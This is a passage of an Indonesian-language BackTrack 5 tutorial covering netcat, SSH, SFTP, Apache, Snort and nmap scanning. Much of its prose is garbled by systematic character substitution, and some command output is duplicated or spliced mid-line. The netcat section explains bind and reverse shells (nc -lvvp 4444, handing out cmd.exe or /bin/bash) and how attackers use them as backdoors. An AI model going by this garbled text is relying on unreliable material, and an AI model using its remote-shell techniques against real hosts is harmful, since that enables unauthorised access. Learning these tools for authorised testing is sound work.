Liste#er &isi#i /er+.#$si se/a$ai 2e#a-2.#$ setia2 reU.est &ari h,st c%ie#t > se#$aja
-a.2.# ti&ak se#$aja -e-i#ta k,#eksi 2a&a 2,rt "a#$ te%ah &i te#t.ka# %iste#er.
(#t.k %e/ih je%as#"a sa"a aka# -e-/eri c,#t,h. Sa"a -e#$$.#aka# /acktrack 5 R1
se/a$ai %iste#er &a# /acktrack 5 +i#a% se/a$ai c%ie#t. S2esi+ikasi -asi#$-asi#$ h,st
se/a$ai /erik.t
Liste#er @ /acktrack 5 R1 B
eth0 Link encap:Ethernet HWaddr 44:87:fc:56:86:85
inet6 addr: fe80::4687:fcff:fe56:8685/64 Scope:Link
RX bytes:4293488 (4.2 MB) TX bytes:543611 (543.6 KB)
Interrupt:43 Base address:0x6000
C%ie#t
RX bytes:118800 (118.8 KB) TX bytes:15010 (15.0 KB)
Maka sa"a aka# -e-/.ka 2,rt )))) se/a$ai %iste#i#$ 2a&a h,st "a#$ /erti#&ak
se/a$ai listener.
Ke-.&ia# 2a&a h,st c%ie#t > sa"a -ereU.est 2,rt )))) 2a&a %iste#er.
4erhatika# te%ah terja&i k,#ekti!itas 2a&a 2,rt 3333 a#tara %iste#er &a# c%ie#t
*.$.). Trans3er 3i/e
Netcat j.$a -e-i%iki ke-a-2.a# .#t.k -e#tra#s+er +i%e &a%a- ha% i#i sa"a -e-/eri
c,#t,h se&erha#a -e#tra#s+er +i%e &ari %iste#er ke c%ie#t.
4a&a %iste#er h,st sa"a -e-/.ka 2,rt 3333 &a# -e#"ia2ka# se/.ah +i%e se/a$ai
,.t2.t
4erhatika# h,st c%ie#t 1:'.169.1.0 te%ah terk,#eksi &e#$a# /aik 2a&a 2i& 3;693 &a#
ke-.&ia# -e#c,/a -e#tra#+er se/.ah +i%e "a#$ sa"a /eri #a-a tra#+er.t1t &a# sa"a
/eri !a%.e t1t &i &a%a-#"a. Ites tra#s+er +i%eJ.
Netcat ti&ak -e-/erika# ta-2i%a# i#+,r-asi 2r,ses secara !er/,se kare#a it. kita
ha#"a -e#.#$$. /e/era2a saat -aka tra#+er +i%e aka# /erhasi%. Maka 2a&a h,st
%iste#er sa"a aka# -e-eriksa hasi%.t1t &a# ter%ihat /ah<a !a%.e &ari tra#s+er.t1t te%ah
/era&a 2a&a h,st %iste#er "ait. 2a&a hasi%.t1t.
*.%. Re5ote s2e// access
Sa%ah sat. a%asa# -e#$a2a #etcat -e#ja&i 2i%iha# /e/era2a attacker &a# 2e#tester
a&a%ah kare#a #etcat -e-i%iki ke-a-2.a# &a%a- -ere-,te she%% a#tara h,st
%iste#er &a# c%ie#t. (#t.k -e-2e%ajari ha% terse/.t > a%a#$kah /aik#"a kita %a#$s.#$
-e%ihat c,#t,h &a# -e-2rakteka##"a. Da%a- c,#t,h i#i sa"a -e#$$.#aka# &.a
h,st &i-a#a h,st 2erta-a > a#$$a2 saja I#a$aJ -e#$$.#aka# /acktrack 5 R1 &a#
Ije#&e%aJ -e#$$.#aka# <i#&,<s 12 ser!ice 2ack 0.
Disi#i Ije#&e%aJ aka# -e#ja&i %iste#er &e#$a# -e-.%ai #etcat .#t.k -e#ja&i %iste#er
2a&a 2,rt 3333
*.%.$ "ind S2e//
K,#&isi &i -a#a c%ie#t aka# -e-i#ta %iste#er .#t.k -e-/eri#"a iji# -e#$akses
she%% re-,te &a# -e#$$.#aka# 2eri#tah2eri#tah she%% 2a&a h,st %iste#er. Kita
$.#aka# +e @ nama file ! aplikasi B. Di-a#a h,st Ije#&e%aJ aka# -e#$iji#ka# c%ie#t
terk,#eksi 2a&a a2%ikasi c5d.e<e "a#$ -e-.#$ki#ka# c%ie#t .#t.k -e#$$.#aka#
c-& &a# -e#$$.#aka# 2eri#tah2eri#tah @ c,--a#& B
Maka I8endelaJ ti#$$a% -e#.#$$. h,st "a#$ aka# -ereU.est 2,rt 3333 "a#$ te%ah &i
/.ka#"a. 4a&a sisi "a#$ /er/e&a > h,st InagaJ aka# -e-i#ta h,st %iste#er @ je#&e%a B
.#t.k -e#eri-a &ia se/a$ai c%ie#t.
Da# c%ie#t /erhasi% terk,#eksi 2a&a c-&.e1e &i -a#a c%ie#t &i 2er/,%ehka# .#t.k
-ere-,te &a# -e#$$.#aka# se-.a +asi%itas c,--a#& 2r,-2t.
).t2.t 2a&a h,st %iste#er @ 8endela B aka# -e#a-2i%ka# s.kses#"a h,st c%ie#t
terk,#eksi &e#$a# &iri#"a
*.%.% Re=erse S2e//
Jika /i#& she%% a&a%ah k,#&isi &i-a#a %iste#er -e-/.ka kese-2ata# .#t.k c%ie#t
-e#$$.#aka# a2%ikasi terte#t. &ari jarak ja.h &e#$a# 2,rt terte#t. > -aka re!erse
she%% a&a%ah se/a%ik#"a. Re!erse She%% -er.2aka# s.at. k,#&isi &i -a#a %iste#er
"a#$ aka# -e#$a-/i% a%ih a2%ikasi "a#$ &ita<arka# ,%eh c%ie#t.
Maka h,st %iste#er aka# -e-/.ka 2,rt 3333
C:\>nc -lvvp 4444
listening on [any] 4444
Ke-.&ia# c%ie#t aka# -ereU.est k,#eksi ke2a&a %iste#er seka%i$.s -e-/eri#"a
akses .#t.k -e#$$.#aka# she%% 2erhatika# ,2si +e @ file!aplikasi shell B "a#$
&ita<arka# c%ie#t @ !bin!bash B.
Ga-/ar &i atas -e#.#j.ka# k,#&isi &i-a#a %iste#er te%ah /erhasi% -e#eri-a c%ie#t
&a# -e#$$.#aka# a2%ikasi she%% &ari c%ie#t. Met,&e i#i seri#$ &i 2akai attacker
sete%ah -e%e2aska# /ack&,,r "a#$ -e-i%iki ke-a-2.a# -e#$esek.si #etcat 2a&a
h,st tar$et.
"A" III
KNO!ING SER(ICE ON "ACKTRACK
Oleh : zee eichel
$. SSHD DAEON SER(ICE
SSH @*ecure *hellB -er.2aka# sta#&ar "a#$ &i$.#aka# .#t.k %,$i# &a#
-e#$e#&a%ika# k,-2.ter &ari jarak ja.h> "a#$ -a#a SSH -er.2aka# 2e#$$a#ti
a2%ikasi te%#et &a# r%,$i# kare#a &ia#$$a2 k.ra#$ ,%eh se,ra#$ a&-i# .#t.k
-e#$,#tr,% k,-2.ter#"a &ari jarak ja.h.
SSH -e-2.#"ai ke%e/iha#> "ait. Q
Enkri6si 6assword &a# 2eri#tah2eri#tah> "a#$ -a#a aka# ter%i#&.#$ &ari s#i++er.
Fit4r T4nne/in1> "a#$ -a#a 2aket2aket 2eri#tah aka# &i 2r,ses &a# &ikiri-ka#
-e%a%.i jari#$a# "a#$ /er/e&a.
K%ie# SSH ha-2ir a&a &i setia2 siste- ,2erasi.
Me#$$.#aka# kode k24s4s .#t.k i&e#ti+ikasi k%ie#.
Versi 4r,t,k,% SSH a&a '> "ait. !ersi 1 &a# '. Ya#$ &a# e#kri2si .#t.k
-e#$h./.#$ka# k,-2.ter c%ie#t -e#$$.#aka# 2,rt -e-/e&aka##"a a&a%ah
i&e#ti+ikasi &e#$a# ser!er.
,2e#SSH -er.2aka# c,#t,h a2%ikasi ser!er .#t.k 2r,t,k,% SSH. K,#+i$.rasi
,2e#SSH /iasa#"a ter&a2at &i I!etcJ &a# I!etc!sshI.
(#t.k SSH c%ie#t /a#"ak -aca-#"a. Di %i#$k.#$a# =i#&,<s /iasa#"a
-e#$$.#aka# -u((9 "a#$ -er.2aka# a2%ikasi c%ie#t SSH "a#$ 2,rta/%e &a# a-a#.
Se&a#$ka# .#t.k siste- ,2erasi Maci#t,sh -e#$$.#aka# MacSSH.
$.$. Pen1o6erasian ss2 ser=ice
$.$.$. Pen114naan SSH c/ient
Se2erti "a#$ te%ah &i je%aska# -e#$e#ai ssh &i atas > kita saat i#i aka# /e%ajar
/a$ai-a#a cara -e#$k,#eksika# > -ereU.est ssh 2a&a %i#.1 ./.#t.. (#t.k
-e%ak.ka# k,#ekti+itas &a# reU.est she%% ,2e# &ari h,st "a#$ -e-i%iki ser!er ssh
a&a%ah &e#$a# s"#ta1 se/a$ai /erik.t Q
syntax : ssh [user]@[host/ip]
Se/a$ai c,#t,h Q
ssh root@192.168.1.44 -p 3320
Di%ihat &ari 2eri#tah ssh &i atas -aka kita &a2atka# /ah<a ssh -e#$$.#aka# +6
99%> kare#a ssh ser!er "a#$ he#&ak sa"a akses te%ah -e#$k,#+i$.rasi 2,rt ssh
/.ka# &e+a.%t %a$i @ 6ort %% B Jika ser!er ssh "a#$ he#&ak a#&a akses -asih
-e#$$.#aka# 2,rt sta#&art -aka a#&a ti&ak 2er%. -e-akai ata. -e#$a/aika# ,2si
+6 @ 6ort B kare#a secara &e+a.%t 2eri#tah ssh aka# -e-/aca 6ort %% se/a$ai 2,rt
sta#&art 2a&a ssh ser!er
$.$.%. eneri5a RSA 3in11er Printin1
Sete%ah ssh ser!er -e#eri-a si#"a% reU.est ssh -aka /iasa#"a kita aka# &i -i#ta
.#t.k -e#"et.j.i a.the#+ikasi RSA 3in11er 2ri#ti#$ &ari ser!er terse/.t
ssh root@192.168.1.6
The authenticity of host '192.168.1.6 (192.168.1.6)' can't be established.
RSA key fingerprint is 3d:8e:07:9f:24:ec:46:5c:98:fb:c2:c4:4b:bf:67:f5.
Are you sure you want to continue connecting (yes/no)?
Warning: Permanently added '192.168.1.6' (RSA) to the list of known hosts.
Connection closed by 192.168.1.6
Jika a#&a te%ah "aki# -e#eri-a#"a -aka a#&a aka# -e-as.ki she%% &ari ser!er "a#$
a#&a t.j.. K#,<# h,sts &ari 1:'.169.1.6 aka# &i -as.ka# &i &a%a- 01local-home-
direktori20'ssh0kno3n4hosts'
$.$.9. Settin1 koneksi SSH den1an a4tenti3ikasi DSA
La#$kah%a#$kah#"a a&a%ah se/a$ai /erik.t
:; &embuat D*A $ey -air
Se&ikit -e#$e#ai DSA > DSA -er.2aka# si#$kata# &ari Digital *ignature Algorithm
"a#$ -er.2aka# sta#&art .#t.k 8*4S ata. &i$ita% si$#at.re. Se2erti ta#&a ta#$a#
ata. si&ik jari a#&a #a#ti#"a @ fingerprinting B
root@bt{/etc/ssh}:ssh-keygen -t dsa
Generating public/private dsa key pair.
Enter file in which to save the key (/root/.ssh/id_dsa):
Enter passphrase (empty for no passphrase): ( isikan password
anda )
Enter same passphrase again: ( isikan password anda )
Your identification has been saved in /root/.ssh/id_dsa.
Your public key has been saved in /root/.ssh/id_dsa.pub.
The key fingerprint is:
4b:4f:fb:15:e8:ab:24:75:79:4d:29:84:13:42:57:ba root@eichel
The key's randomart image is:
zee@eichel{/etc/ssh}:ssh-keygen -t dsa
Generating public/private dsa key pair.
Enter file in which to save the key (/root/.ssh/id_dsa):
Enter passphrase (empty for no passphrase): ( isikan password
anda )
Enter same passphrase again: ( isikan password anda )
Your identification has been saved in /root/.ssh/id_dsa.
Your public key has been saved in /root/.ssh/id_dsa.pub.
The key fingerprint is:
4b:4f:fb:15:e8:ab:24:75:79:4d:29:84:13:42:57:ba root@eichel
The key's randomart image is:
+--[ DSA 1024]----+
+-----------------+
4eri#tah ta&i aka# -e-/.at ke" ssh &sa "a#$ ke-.&ia# aka# &i si-2a# 2a&a
!root!1ssh!id<dsa se/a$ai 6ri=ate ke7 &a# id<dsa1pub se/a$ai 64b/ic ke7.
:; *et Direktori Akses
root@bt{~}:sudo chmod 755 .ssh
[Y +opy file
c,2"ka# +i%e &sa 2./%ik ke &irekt,ri ser!er ssh "a#$ a#&a t.j.
root@bt{~}:sudo scp ~/.ssh/id_dsa.pub
root@192.168.1.6:.ssh/authorized_keys
root@192.168.1.6's password:
id_dsa.pub
00:00
100%
601
0.6KB/s
ka%a. se-.a#"a se%esai j$# %.2a -e#$at.r +i%e akses &i ser!er ssh > %,$i# ke
ser!er ssh ke-.&ia# setti#$ 2a&a ter-i#a% ser!er#"a
sudo chmod 600 ~/.ssh/authorized_keys
ke-.&ia# c,/a %,$i# ke-/a%i se2erti %,$i# /iasa#"a -aka a#&a aka# &i -i#ta
2ri!ate ke" "a#$ s.&ah a#&a setti#$ se/e%.-#"a . Jika a#&a i#$i# %,$i# &e#$a# DSA
ke" ta#2a har.s -e#$etik 2ass<,r& 2ri!ate ke" -aka ik.ti %a#$kah%a#$kah &i
/a<ah i#i
root@bt{~}:sudo exec /usr/bin/ssh-agent $SHELL
root@bt{~}:sudo ssh-add
Enter passphrase for /root/.ssh/id_dsa:
Identity added: /root/.ssh/id_dsa (/root/.ssh/id_dsa)
$.%. SSH ser=er
4a&a Backtrack> ser!ice ssh s.&ah teri#sta%% secara &e+a.%t. Be/era2a 2eri#tah &asar
&a%a- ser!ice ssh a&a%ah
-Menyalakan service
/etc/init.d/ssh start
-Menon-aktifkan service
/etc/init.d/ssh stop
-Restart service
/etc/init.d/ssh restart
$.%.$. Kon3i14rasi SSH Ser=er
(#t.k -e%ak.ka# 2e#$at.ra# -aka kita &a2at -e#$$.#aka# e&it,r kesa"a#$a# kita
&a# -e-/.ka +i%e k,#+i$.rasi "a#$ ter&a2at 2a&a &irekt,ri !etc!ssh!sshd<config
Berik.t i#i &e+a.%t setti#$ &ari ssh&Fc,#+i$
# Package generated configuration file
# See the sshd_config(5) manpage for details
# What ports, IPs and protocols we listen for
Port 22
# Use these options to restrict which
interfaces/protocols sshd will bind to
#ListenAddress ::
#ListenAddress 0.0.0.0
Protocol 2
# HostKeys for protocol version 2
HostKey /etc/ssh/ssh_host_rsa_key
HostKey /etc/ssh/ssh_host_dsa_key
#Privilege Separation is turned on for security
UsePrivilegeSeparation yes
# Lifetime and size of ephemeral version 1 server key
KeyRegenerationInterval 3600
ServerKeyBits 768
# Logging
SyslogFacility AUTH
LogLevel INFO
# Authentication:
LoginGraceTime 120
PermitRootLogin yes
StrictModes yes
RSAAuthentication yes
PubkeyAuthentication yes
#AuthorizedKeysFile
%h/.ssh/authorized_keys
# Don't read the user's ~/.rhosts and ~/.shosts files
IgnoreRhosts yes
# For this to work you will also need host keys in
/etc/ssh_known_hosts
RhostsRSAAuthentication no
# similar for protocol version 2
HostbasedAuthentication no
# Uncomment if you don't trust ~/.ssh/known_hosts for
RhostsRSAAuthentication
#IgnoreUserKnownHosts yes
# To enable empty passwords, change to yes (NOT
RECOMMENDED)
PermitEmptyPasswords no
# Change to yes to enable challenge-response passwords
(beware issues with
# some PAM modules and threads)
ChallengeResponseAuthentication no
# Change to no to disable tunnelled clear text passwords
#PasswordAuthentication yes
# Kerberos options
#KerberosAuthentication no
#KerberosGetAFSToken no
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes
# GSSAPI options
#GSSAPIAuthentication no
#GSSAPICleanupCredentials yes
X11Forwarding yes
X11DisplayOffset 10
PrintMotd no
PrintLastLog yes
TCPKeepAlive yes
#UseLogin no
#MaxStartups 10:30:60
#Banner /etc/issue.net
# Allow client to pass locale environment variables
AcceptEnv LANG LC_*
Subsystem sftp /usr/lib/openssh/sftp-server
#allow user tertentu
AllowUsers root
# Set this to 'yes' to enable PAM authentication, account
processing,
# and session processing. If this is enabled, PAM
authentication will
# be allowed through the ChallengeResponseAuthentication
and
# PasswordAuthentication.
Depending on your PAM configuration,
# PAM authentication via ChallengeResponseAuthentication
may bypass
# the setting of "PermitRootLogin without-password".
# If you just want the PAM account and session checks to
run without
# PAM authentication, then enable this but set
PasswordAuthentication
# and ChallengeResponseAuthentication to 'no'.
UsePAM yes
UseDNS no
Jika a#&a -e#$i#$i#ka# ssh terk,#eksi &e#$a# 2,rt "a#$ /er/e&a &e#$a# 2,rt
sta#&art @ '' B -aka a#&a 2.# &a2at -e%ak.ka# k,#+i$.rasi 2a&a
# What ports, IPs and protocols we listen for
Port 1345
4a&a c,#t,h &i atas sa"a -e#$$a#ti 2,rt sta#&art '' &e#$a# 2,rt $9)* sehi#$$a ssh
aka# -e-ai#ka# ser!ice#"a 2a&a 2,rt 1035 serta c%ie#t aka# -e#$akses ssh &e#$a#
ta-/aha# i#+,r-asi 2,rt /ar..
De-i a%asa# kea-a#a# sa"a sa#$at -e#"ara#ka# a$ar -e#$at.r ssh .#t.k ti&ak
-e#eri-a .ser r,,t .#t.k a<a% %,$i#. A#&a &a2at -e#$$.#aka# .ser s.&&,ers .#t.k
-e%ak.ka# 2e#$at.ra# a&-i#istrati+ r,,t.
PermitRootLogin no
(#t.k -e-/atasi ha#"a .ser.ser terte#t. -aka a#&a &a2at -e#$$.#aka# ta-/aha#
k,#+i$.rasi i#i
AllowUsers zee angga jimmy
C,#t,h &i atas a&a%ah k,#+i$.rasi ssh "a#$ ha#"a -e-2er/,%ehka# .ser.ser
/er#a-a Hee> a#$$a &a# ji--" .#t.k -e-as.ki k,#eksi sec.re she%%. Da# -asih
/a#"ak %a$i seti#$a# &a# k,#+i$.rasi ssh &i sa#a. Sete%ah a#&a -e%ak.ka# /e/era2a
k.st,-isasi -aka restart ser!ice ssh a#&a .#t.k -e#ja%a#ka# 2er./aha#.
$.9. SFTP dan SCP
s3t6 @ secure file transfer protocol B a&a%ah i#terakti+ 2r,$ra- +i%e tra#s+er > ha-2ir
sa-a &e#$a# +t2> ha#"a se-.a ,2erasi -e%a%.i e#skri2si ssh
s7nta< C s3t6 G4serna5eHKG2ostna5eH
[root@bt zee]# sftp root@192.168.1.10
The authenticity of host '192.168.1.10 (192.168.1.10)' can't be
established.
RSA key fingerprint is
73:87:67:6f:88:9f:09:ae:25:3c:8e:54:97:95:b9:48.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.10' (RSA) to the list of
known hosts.
Ke-.&ia# .#t.k 2e#$,2erasia# kita $.#aka# &.a 2eri#tah
IputJ 2eri#tah .#t.k -e#.2%,a& +i%e ke re-,te s3t6 h,st
c,#t,h Q
[root@bt zee]# sftp root@192.168.1.10
The authenticity of host '192.168.1.10 (192.168.1.10)' can't be
established.
RSA key fingerprint is
3d:8e:07:9f:24:ec:46:5c:98:fb:c2:c4:4b:bf:67:f5.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.10' (RSA) to the list of
known hosts.
Connected to 192.168.1.10.
sftp> put tutor.txt
Uploading tutor.txt to /root/tutor.txt
tutor.txt 100% 7842
7.7KB/s 00:00
sftp>
C,#t,h &iatas se/e#ar#"a a&a%ah -e#$.2%,a& +i%e t.t,r.t1t "a#$ /era&a 2a&a
&irekt,ri Ah,-eAHeeA @ s+t2 aka# -e-/aca &irekt,ri &i-a#a &ia &i2a#$$i% B -e#.j.
ke &irekt,ri .ser r,,t 2a&a h,st 1:'.169.1.1;.
IgetJ 2eri#tah .#t.k -e#&,<#%,a& +i%e &ari re-,te h,st
sftp> ls
Desktop backtrack5_update.py fimap.log
s.e.t+dns_spoof tutor.txt
sftp> get s.e.t+dns_spoof
Fetching /root/s.e.t+dns_spoof to s.e.t+dns_spoof
/root/s.e.t+dns_spoof 100% 20MB
2.3MB/s 00:09
sftp>
Kita /isa -e-as.ka# 2ara-eter ta-/aha# %ai##"a. Misa%#"a jika 2,rt ssh 2a&a
re-,te h,st s.&ah ti&ak sta#&art %a$i -aka a#&a &a2at -e-as.ka# 2ara-eter ,
sftp -o "Port 6482" root@linux.foo
%. HTTPD DAEON SER(ICE
HTT4D ser!ice secara &e+a.%t s.&ah teri#sta%% &e#$a# -e-akai a2ache se/a$ai t,,%s
2e#",k,#$#"a.
%.$. Pen1o6erasian HTTPD Dae5on ser=ice
-Menyalakan service
/etc/init.d/apache2 start
-Menon-aktifkan service
/etc/init.d/apache2 stop
-Restart service
/etc/init.d/apache2 restart
-reload service
/etc/init.d/apache2 reload
-memaksa apache untuk reload service
/etc/init.d/apache2 force reload
%.%. Kon3i14rasi HTTPD Dae5on ser=ice
8i%e k,#+i$.rasi a2ache' secara &e+a.%t ter&a2at 2a&a &irekt,ri
!etc!apache!apache1conf &a# 2e#$at.ra# 2h25 @ jika &ii#sta%% B 2a&a
!etc!php=!apache!php1ini
Secara &e+a.%t &irekt,ri 2e#"i-2a#a# +i%e 2a&a a2ache' ter&a2at 2a&a +i%e A!arA<<<.
Se2erti %a"ak#"a ser!er HTTPD a2ache' %ai##"a > a#&a j.$a &a2at -e-/.at h,st
@ !irt.a% B /ar. &e#$a# -e#a-/ahka# +i%e h,st /ar. 2a&a !etc!apache!sites6
available ke-.&ia# -e#$akti+ka# ata. -e#,#akti+ka##"a &e#$a# 2eri#tah
a%ensite G site H +++ 5en1akti3kan =irt4a/ 2ost
a%dissite G site H +++ 5enonakti3kan =irt4a/ 2ost
9. GPSD DAEON SER(ICE
Dae-,# "a#$ &i $.#aka# .#t.k G4S recei!ers> $2s& a&a%ah se/.ah &ae-,# -,#it,r
"a#$ -e-,#it,ri#$ 2,rt TC4 A *4 @':37 secara &e+a.%tB.
9.$. Pen1o6erasian GPSD dae5on ser=ice
Me#"a%aka# ser!ice
/etc/init.d/gpsd start
Me#,#akti+ka# ser!ice
/etc/init.d/gpsd stop
Restart ser!ice
/etc/init.d/gpsd restart
9.%. Kon3i14rasi GPSD dae5on ser=ice
$. Perta5a+ta5a kita co/okan ter/ebi2 da24/4 GPS de=ice kita ke 4sb
%. cek 6osisi 4sb GPS
[root@bt ~]# ls -l /dev/tty*S*
crw-rw---- 1 root dialout 4, 64 Sep 21 13:12 /dev/ttyS0
crw-rw---- 1 root dialout 167, 0 Sep 22 16:43
/dev/ttyUSB0
[root@bt ~]#
). SNORT Dae5on Ser=ice
S#,rt a&a%ah ,2e# s,.rce t,,%s i#tr.si,#
2re!e#ti,# s"ste- @N*4SB &a# #et<,rk
i#tr,si,# &etecti,# s"ste- @N*DSB. S#,rt
-e-i%iki ke-a-2.a# .#t.k -e-,#it,ri#$
2aket2aket seka%i$.s -e#ja&i sec.rit"
t,,%s "a#$ /er$.#a .#t.k -e#&eteksi
/er/a$ai sera#$a# > se/a$ai c,#t,h &&,s >
M*TM attack > &%%
).$. Pen1o6erasian Snort dae5on ser=ice
Me#"a%aka# ser!ice
/etc/init.d/snort start
Me#,#akti+ka# ser!ice
/etc/init.d/snort stop
Restart ser!ice
/etc/init.d/snort restart
-re%,a& ser!ice
/etc/init.d/snort reload
--e-aksa a2ache .#t.k re%,a& ser!ice
/etc/init.d/snort force reload
--e%ihat stat.s ser!ice
/etc/init.d/snort status
root@bt:/var/log/snort# snort --version
,,_ -*> Snort! <*-
o" )~ Version 2.8.5.2 (Build 121)
'''' By Martin Roesch & The Snort Team:
http://www.snort.org/snort/snort-team
Copyright (C) 1998-2009 Sourcefire, Inc., et
al.
Using PCRE version: 7.8 2008-09-05
Secara &e+a.%t -aka +i%e c,#+i$.rasi s#,rt /era&a 2a&a IAetcAs#,rtAs#,rt.c,#+J Sa"a
aka# -e#c,#t,hka# 2e#$$.#aa# s#,rt 2a&a /acktrack 5.
).$.$. S5art 6acket 3i/ter dan r4/e+set
Secara $aris /esar se/e#ar#"a s#,rt -er.2aka# t,,%s "a#$ -a-2. -e#+i%ter 2aket
.#t.k &ita"a#$ka# 2a&a ,.t2.t -,#it,ri#$ se2erti %a"ak#"a 0ireshark &a# tcpdump.
Packet 3i/terC tc6d456 =s snort
4a&a c,#t,h ka%i i#i sa"a -e#$$.#aka# -esi# attacker &e#$a# i2 a&&ress
1:'.169.1.3 &e#$a# ,2erati#$ siste- +e&,ra "a#$ teri#sta%% &a# -esi# k,r/a# &e#$a#
i2 a&&ress 1:'.169.1.06 &e#$a# siste- ,2erati#$ /acktrack "a#$ teri#sta%% s#,rt
secara &e+a.%t
).$.%. Port %% 5onitorin1
attacker acti,# test
[root@bt]$ ssh root@192.168.1.36
).$.9. Snort action test
root@bt:# snort -q -v -i wlan0
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
01/22-01:36:59.101458 192.168.1.4:43008 -> 192.168.1.36:22
TCP TTL:64 TOS:0x10 ID:50894 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x49062A17 Ack: 0xD31AB6F1 Win: 0x4BD6 TcpLen:
32
TCP Options (3) => NOP NOP TS: 6514316 3822620
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
01/22-01:36:59.102054 192.168.1.4:43008 -> 192.168.1.36:22
***A**** Seq: 0x49062A17 Ack: 0xD31ABC21 Win: 0x4BD6 TcpLen:
32
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
).$.9. ICP Re6/7 5onitorin1
attacker si&e
Xr,,tS/t Y\ 2i#$ 1:'.169.1.06
tar$et si&e
root@bt:# snort -q -v -i wlan0
01/22-01:43:43.495089 192.168.1.36:22 -> 192.168.1.4:43008
***AP*** Seq: 0xD34D2BE1 Ack: 0x49062D77 Win: 0x2DF TcpLen:
32
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
"A" I(
INFORATION GATHERING
Oleh : zee eichel
$. THE E:E OF NAP
$.$. Pen1ertian NAP
N5a6 @>et0ork &apperB a&a%ah se/.ah 2r,$ra- ,2e# s,.rce "a#$ /er$.#a.#t.k
-e#$esks2%,rasi jari#$a#.
] N-a2 &i&esai# .#t.k &a2at -e%ak.ka# sca# jari#$a# "a#$ /esar> j.$a &a2at
&i$.#aka# .#t.k -e%ak.ka# sca# h,st t.#$$a%.
] N-a2 -e#$$.#aka# 2aket *4 .#t.k -e#e#t.ka# h,st h,st "a#$ akti+ &a%a- s.at.
jari#$a#>2,rt2,rt "a#$ ter/.ka> siste- ,2erasi "a#$ &i2.#"ai> ti2e +ire<a%% "a#$
&i2akai> &%%.
Ke4n114/an+ke4n114/an 7an1 di5i/iki o/e2 N5a6Q
] 4,<er+.%
] N-a2 &a2at &i$.#aka# .#t.k -e#sca# jari#$a# "a#$ /esar
] 4,rta/%e
] N-a2 &a2at /erja%a# &i /er/a$ai -aca- siste- ,2erasi se2erti Li#.1> =i#&,<s>
] 8reeBSD> )2e#BSD> S,%aris> &%%
] M.&ah .#t.k &i$.#aka#
] 8ree
] Me-2.#"ai &,k.-e#tasi "a#$ /aik

S"#ta1 Q n5a6 GScan T76e?s@H GO6tionsH Ntar1et s6eci3icationO
$.%. Perinta2+6erinta2 dasar
$.%.$ Perinta2 dasar NAP
#nmap [host]
[root@bt]# nmap 192.168.1.11
Starting Nmap 5.50 ( http://nmap.org ) at 2012-01-22
16:00 WIT
Nmap scan report for 192.168.1.11
Host is up (0.0066s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
21/tcp open ftp
3128/tcp open squid-http
MAC Address: 30:2D:BD:92:AE:51 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 1.78
seconds
$.%.%. He/6 Co55and
(#t.k -e%ihat -e#. %ist c,--a#&
#nmap -h
$.%.9. 4/ti IP Scannin1
(#t.k sca##i#$ %e/ih &ari sat. *4
#nmap [host1] [host2] [host3]
[root@bt]# nmap 192.168.1.11 192.168.1.4 192.168.1.6
Starting Nmap 5.50 ( http://nmap.org ) at 2012-01-22 16:02 WIT
PORT STATE SERVICE
21/tcp open ftp
PORT STATE SERVICE
22/tcp open ssh
Not shown: 784 closed ports, 214 filtered ports
PORT STATE SERVICE
22/tcp open ssh
62078/tcp open iphone-sync
MAC Address: 90:27:E4:83:2F:F3 (Apple)
Nmap done: 3 IP addresses (3 hosts up) scanned in 8.78 seconds
$.%.). G+OH O6eratin1 S7ste5
#nmap -O [ target IP ]
-e-eri#tahka# #-a2 .#t.k -e#&eteksi ,2erati#$ s"ste- tar$et
[root@bt]# nmap -O 192.168.1.4
16:34 WIT
PORT STATE SERVICE
22/tcp open ssh
No exact OS matches for host (If you know what OS is
running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=5.50%D=1/22%OT=22%CT=1%CU=43741%PV=Y%DS=0%DC=L
%G=Y%TM=4F1BD823%P=
OS:i386-redhat-linux-gnu)SEQ(SP=107%GCD=1%ISR=10#nmap
[host]
[root@bt]# nmap 192.168.1.11
16:00 WIT
PORT STATE SERVICE
21/tcp open ftp
seconds
$.%.*. G+PNH not Pin1
Me-eri#tahka# #-a2 -e%ak.ka# sca##i#$ ta#2a -e%ak.ka# 2i#$ > sehi#$$a 2r,ses
aka# %e/ih se&erha#a
#nmap -PN [ target IP ]
[root@bt]# nmap -PN 192.168.1.6
PORT STATE SERVICE
22/tcp open ssh
62078/tcp open iphone-sync
Nmap done: 1 IP address (1 host up) scanned in 6.48 seconds
$.%... G+s(H ser=ice
Me-eri#tahka# #-a2 -e%ak.ka# sca##i#$ &e#$a# -e#a-2i%ka# i#+,r-asi &ari
ser!ice terte#t.
#nmap -sV [ target IP ]
[root@zee zee]# nmap -sV 192.168.1.4
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.6 (protocol 2.0)
Service detection performed. Please report any incorrect results
at http://nmap.org/submit/ .
$.%.&. G +sn H U6 Host
Me-eri#tahka# #-a2 .#t.k -e-eriksa a2akah h,st terse/.t .2 ata. ti&ak.
A%a#$kah %e/ih /aik jika &i/erika# ta#&a #et-ask .#t.k -e#$a-/i% se%.r.h h,st
2a&a #et<,rk ra#$e #et-ask terte#t.
[root@bt]# nmap -sn 192.168.1.4/24
MAC Address: C8:64:C7:4B:B8:D0 (Unknown)
MAC Address: 8C:7B:9D:63:48:AB (Unknown)
Host is up.
MAC Address: 22:E2:51:9A:94:45 (Unknown)
MAC Address: 00:19:D2:45:4D:96 (Intel)
MAC Address: 00:1E:C1:4C:BF:F6 (3com Europe)
MAC Address: 1C:4B:D6:44:75:9D (AzureWave)
Nmap done: 256 IP addresses (7 hosts up) scanned in 3.52
seconds
$.%.A. G+sPH si56/e Pin1
Me-eri#tahka# #-a2 -e%ak.ka# sca##i#$ &e#$a# -e%ak.ka# si-2%e 2i#$
